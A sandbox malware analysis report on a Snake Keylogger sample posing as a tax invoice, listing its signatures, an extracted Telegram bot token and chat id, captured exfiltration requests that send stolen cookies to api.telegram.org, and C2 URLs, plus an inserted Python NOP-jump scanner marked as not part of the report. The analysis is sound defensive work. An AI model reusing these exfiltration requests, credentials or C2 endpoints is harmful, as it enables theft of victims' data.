Windows Analysis Report
(STC) Tax Invoice 25030216_REV.exe

Overview

General Information

Sample name: (STC) Tax Invoice 25030216_REV.exe
Analysis ID: 1651004
MD5: 1f2316cbbb6f340ea45753ea5c889f11
SHA1: 3b49e0d165f9be0ac0443fa75ce4dcd25901dbcf
SHA256: 81f89461fc1feee34ad39a56fb386ed8e65eabe13416a20baa5b7adc6593e138
Tags: exe, Invoice, SnakeKeylogger, user-cocaman

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
Binary is likely a compiled AutoIt script file
Initial sample is a PE file and has a suspicious name
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Sample uses string decryption to hide its real strings
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

[Classification chart: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; scale: clean / suspicious / malicious]
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keystrokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection

Source: 00000000.00000002.1238598112.0000000003830000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7332888932:AAEd0xO46FUg-eZu8OorYiVnZ_y4D9P2pCE", "Chat id": "7128988401"}
Source: 00000000.00000002.1238598112.0000000003830000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7332888932:AAEd0xO46FUg-eZu8OorYiVnZ_y4D9P2pCE", "Chat_id": "7128988401", "Version": "4.4"}
Source: RegSvcs.exe.604.2.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7332888932:AAEd0xO46FUg-eZu8OorYiVnZ_y4D9P2pCE/sendMessage"}
Source: (STC) Tax Invoice 25030216_REV.exe ReversingLabs: Detection: 77%
Source: (STC) Tax Invoice 25030216_REV.exe Virustotal: Detection: 73%
Source: Submitted Sample Neural Call Log Analysis: 99.2%
Source: 2.2.RegSvcs.exe.400000.0.unpack String decryptor: 7332888932:AAEd0xO46FUg-eZu8OorYiVnZ_y4D9P2pCE
Source: 2.2.RegSvcs.exe.400000.0.unpack String decryptor: 7128988401
Source: 2.2.RegSvcs.exe.400000.0.unpack String decryptor:

Location Tracking

Source: unknown DNS query: name: reallyfreegeoip.org
Source: (STC) Tax Invoice 25030216_REV.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49696 version: TLS 1.0
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: Binary string: wntdll.pdbUGP source: (STC) Tax Invoice 25030216_REV.exe, 00000000.00000003.1236873842.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, (STC) Tax Invoice 25030216_REV.exe, 00000000.00000003.1237139316.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: (STC) Tax Invoice 25030216_REV.exe, 00000000.00000003.1236873842.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, (STC) Tax Invoice 25030216_REV.exe, 00000000.00000003.1237139316.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E8445A GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00E8445A
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E8C6D1 FindFirstFileW,FindClose, 0_2_00E8C6D1
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E8C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_00E8C75C
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E8EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00E8EF95
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E8F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00E8F0F2
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E8F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00E8F3F3
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E837EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00E837EF
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E83B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00E83B12
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E8BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00E8BCBC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 027BF2EDh 2_2_027BF150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 027BFAA9h 2_2_027BF804
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 027BF2EDh 2_2_027BF33C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 027BF2EDh 2_2_027BF3BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05407EB5h 2_2_05407B78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05409280h 2_2_05408FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05400FF1h 2_2_05400D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0540E81Fh 2_2_0540E550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0540C82Fh 2_2_0540C560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0540A83Fh 2_2_0540A570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0540ECAFh 2_2_0540E9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0540CCBFh 2_2_0540C9F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 054018A1h 2_2_054015F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05401449h 2_2_054011A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 054002E9h 2_2_05400040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0540BF0Fh 2_2_0540BC40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05409F1Fh 2_2_05409C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05403709h 2_2_05403460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 054032B1h 2_2_05403008
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 054062D9h 2_2_05406030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0540DEFFh 2_2_0540DC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0540E38Fh 2_2_0540E0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0540C39Fh 2_2_0540C0D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0540A3AFh 2_2_0540A0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05400B99h 2_2_054008F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05406733h 2_2_05406488
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05400741h 2_2_05400498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05402A01h 2_2_05402758
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 054025A9h 2_2_05402300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0540F5CFh 2_2_0540F300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0540D5DFh 2_2_0540D310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 054079C9h 2_2_05407720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0540B5EFh 2_2_0540B320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 054055D1h 2_2_05405328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05409A8Fh 2_2_054097C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05405E81h 2_2_05405BD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05405A29h 2_2_05405780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0540FA5Fh 2_2_0540F790
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0540DA6Fh 2_2_0540D7A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05402E59h 2_2_05402BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0540BA7Fh 2_2_0540B7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05401CF9h 2_2_05401A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05407119h 2_2_05406E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0540F13Fh 2_2_0540EE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05404D21h 2_2_05404A78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0540ACCFh 2_2_0540AA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05406CC1h 2_2_05406A18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 054048C9h 2_2_05404620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05407571h 2_2_054072C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05405179h 2_2_05404ED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0540D14Fh 2_2_0540CE80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0540B15Fh 2_2_0540AE90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05402151h 2_2_05401EA8
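The "4x nop then jmp" hits listed above are Joe Sandbox's own heuristic for inlined NOP padding in the JIT-compiled RegSvcs.exe code; how the sandbox implements it is not shown on this page. The scanner below is an added example, not code from the report or from Joe Sandbox: it approximates the check as "a run of at least four 0x90 bytes immediately followed by an EB rel8 or E9 rel32 JMP" and resolves the jump target so the result can be compared with the report's `jmp XXXXXXXXh` values. The byte buffer it scans is constructed, not dumped from the sample: it reproduces the first hit (a jump to 0x027BF2ED from the function at 0x027BF150), and the two-NOP decoy and the short backward jump are assumptions added to exercise the edge cases.

```python
"""NOP-run-then-JMP scanner (added example, approximating Joe Sandbox's
"4x nop then jmp" heuristic; the real implementation is not on this page).

Finds runs of at least `min_nops` 0x90 bytes immediately followed by a
relative JMP (EB rel8 or E9 rel32) and resolves the jump target, so hits can
be compared with the 'jmp XXXXXXXXh' values in the report.
"""
import struct

NOP = 0x90
JMP_SHORT = 0xEB   # EB rel8  : 2-byte instruction
JMP_NEAR = 0xE9    # E9 rel32 : 5-byte instruction


def find_nop_then_jmp(code, base, min_nops=4):
    """Return [(nop_run_addr, jmp_addr, jmp_target)] for each NOP run + JMP."""
    hits = []
    n = len(code)
    i = 0
    while i < n:
        if code[i] != NOP:
            i += 1
            continue
        start = i
        while i < n and code[i] == NOP:
            i += 1
        if i - start < min_nops or i >= n:
            continue                       # run too short, or buffer ended
        op = code[i]
        if op == JMP_SHORT and i + 2 <= n:
            rel = struct.unpack_from("<b", code, i + 1)[0]
            hits.append((base + start, base + i, base + i + 2 + rel))
        elif op == JMP_NEAR and i + 5 <= n:
            rel = struct.unpack_from("<i", code, i + 1)[0]
            hits.append((base + start, base + i, base + i + 5 + rel))
        # anything else after the NOPs (e.g. RET) is not a hit
    return hits


def build_sample(base=0x027BF150):
    """Constructed code buffer (not bytes from the sample): reproduces the
    report's first hit (NOPs in 0x027BF150's function jumping to 0x027BF2ED),
    plus a two-NOP decoy that must be ignored and a short backward jump."""
    target = 0x027BF2ED
    buf = bytearray(b"\x55\x8b\xec" + b"\xcc" * 0x1D)   # push ebp; mov ebp,esp; filler
    jmp_at = base + len(buf) + 4                        # E9 sits after 4 NOPs
    buf += b"\x90" * 4 + b"\xE9" + struct.pack("<i", target - (jmp_at + 5))
    buf += b"\x90\x90\xC3"                              # 2 NOPs + RET: too short
    buf += b"\x90" * 5 + b"\xEB" + struct.pack("<b", -0x10)  # 5 NOPs + jmp back 16
    return bytes(buf)


if __name__ == "__main__":
    for nops, jmp, target in find_nop_then_jmp(build_sample(), 0x027BF150):
        print(f"nops at {nops:08X}, jmp at {jmp:08X} -> {target:08X}")
```

Run it against a dump of the RegSvcs.exe region at its load address and the addresses it reports line up with the report's values; a NOP run that is not followed by a jump, or a jump too close to the end of the buffer to decode, is ignored rather than mis-reported.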

Networking

Source: Network traffic Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:49712 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:49714 -> 149.154.167.220:443
Source: unknown DNS query: name: api.telegram.org
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2029/03/2025%20/%2014:12:19%0D%0ACountry%20Name:%20United%20States%0D%0A[%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot7332888932:AAEd0xO46FUg-eZu8OorYiVnZ_y4D9P2pCE/sendDocument?chat_id=7128988401&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 | Content-Type: multipart/form-data; boundary=------------------------8dd6f1bd0b1aa93 | Host: api.telegram.org | Content-Length: 741
Source: Joe Sandbox View IP Address: 149.154.167.220
Source: Joe Sandbox View IP Address: 104.21.112.1
Source: Joe Sandbox View IP Address: 158.101.44.242
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown DNS query: name: checkip.dyndns.org
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49700 -> 158.101.44.242:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49693 -> 158.101.44.242:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49711 -> 104.21.112.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49709 -> 104.21.112.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49699 -> 104.21.112.1:443
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E922EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile, 0_2_00E922EE
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: unknown HTTP traffic detected: POST /bot7332888932:AAEd0xO46FUg-eZu8OorYiVnZ_y4D9P2pCE/sendDocument?chat_id=7128988401&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 | Content-Type: multipart/form-data; boundary=------------------------8dd6f1bd0b1aa93 | Host: api.telegram.org | Content-Length: 741
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Fri, 28 Mar 2025 09:40:59 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: RegSvcs.exe, 00000002.00000002.3702479918.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: (STC) Tax Invoice 25030216_REV.exe, 00000000.00000002.1238598112.0000000003830000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3700812554.0000000000402000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: (STC) Tax Invoice 25030216_REV.exe, 00000000.00000002.1238598112.0000000003830000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3700812554.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3702479918.0000000002931000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: (STC) Tax Invoice 25030216_REV.exe, 00000000.00000002.1238598112.0000000003830000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3700812554.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3702479918.0000000002931000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: RegSvcs.exe, 00000002.00000002.3702479918.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: RegSvcs.exe, 00000002.00000002.3702479918.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.orgd
Source: RegSvcs.exe, 00000002.00000002.3702479918.0000000002931000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000002.00000002.3702479918.0000000002931000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: (STC) Tax Invoice 25030216_REV.exe, 00000000.00000002.1238598112.0000000003830000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3700812554.0000000000402000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000002.00000002.3702479918.0000000002931000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: (STC) Tax Invoice 25030216_REV.exe, 00000000.00000002.1238598112.0000000003830000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3700812554.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3702479918.0000000002931000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003C12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org?q=
Source: RegSvcs.exe, 00000002.00000002.3702479918.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3702479918.0000000002A19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: RegSvcs.exe, 00000002.00000002.3702479918.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3700812554.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3702479918.0000000002A19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: RegSvcs.exe, 00000002.00000002.3702479918.0000000002A19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: RegSvcs.exe, 00000002.00000002.3702479918.0000000002A19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20a
Source: RegSvcs.exe, 00000002.00000002.3702479918.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7332888932:AAEd0xO46FUg-eZu8OorYiVnZ_y4D9P2pCE/sendDocument?chat_id=7128
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003C12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003C4C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3704002615.0000000003C12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003C4C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3704002615.0000000003C12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegSvcs.exe, 00000002.00000002.3702479918.0000000002ABE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3702479918.0000000002AAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: RegSvcs.exe, 00000002.00000002.3702479918.0000000002ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en4
Source: RegSvcs.exe, 00000002.00000002.3702479918.0000000002AAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en8
Source: RegSvcs.exe, 00000002.00000002.3702479918.0000000002AB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003C12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003C4C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3704002615.0000000003C12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtabv20-
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003C12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003C12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gemini.google.com/app?q=
Source: RegSvcs.exe, 00000002.00000002.3702479918.000000000297F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3702479918.00000000029F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
